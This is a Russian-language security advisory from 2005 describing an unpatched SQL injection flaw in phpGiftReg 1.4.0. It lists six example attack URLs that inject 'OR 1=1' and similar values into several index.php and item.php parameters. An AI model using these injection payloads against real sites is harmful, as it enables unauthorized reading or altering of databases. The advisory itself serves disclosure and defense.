Дата публикации: | 24.01.2005 |
Всего просмотров: | 1003 |
Опасность: | Высокая |
Наличие исправления: | |
Количество уязвимостей: | 1 |
CVE ID: | Нет данных |
Вектор эксплуатации: | |
Воздействие: | |
CWE ID: | Нет данных |
Наличие эксплоита: | Нет данных |
Уязвимые продукты: | |
Уязвимые версии: phpGiftReq 1.4.0
Описание: Уязвимость существует из-за некорректной фильтрации данных. Удаленный пользователь может с помощью специально сформированного URL выполнить произвольные SQL запросы в текущее базе данных. Примеры: http://[target]/phpgiftreg/index.php?action=ack&messageid=2%20OR%201%3d1 http://[target ]/phpgiftreg/index.php?action=approve&shopper=1%20OR%201%3d1 http://[target]/phpgiftreg/index.php?action=decline&shopper=1%20OR%201%3d1 http://[target]/phpgiftreg/i ndex.php?action=request&shopfor=3%2c0%29%2c%2899%2c100 http://[target]/phpgiftreg/index.php?action=cancel&shopfor=3%20OR%201%3d1 http://[target]/phpgiftreg/item.php ?action=delete&itemid=3%20OR%201%3d1 URL производителя: http://phpgiftreg.sourceforge.net/ Решение: Способов устранения уязвимости не существует в настоящее время. |
|
Ссылки: | phpGiftReq SQL Injection |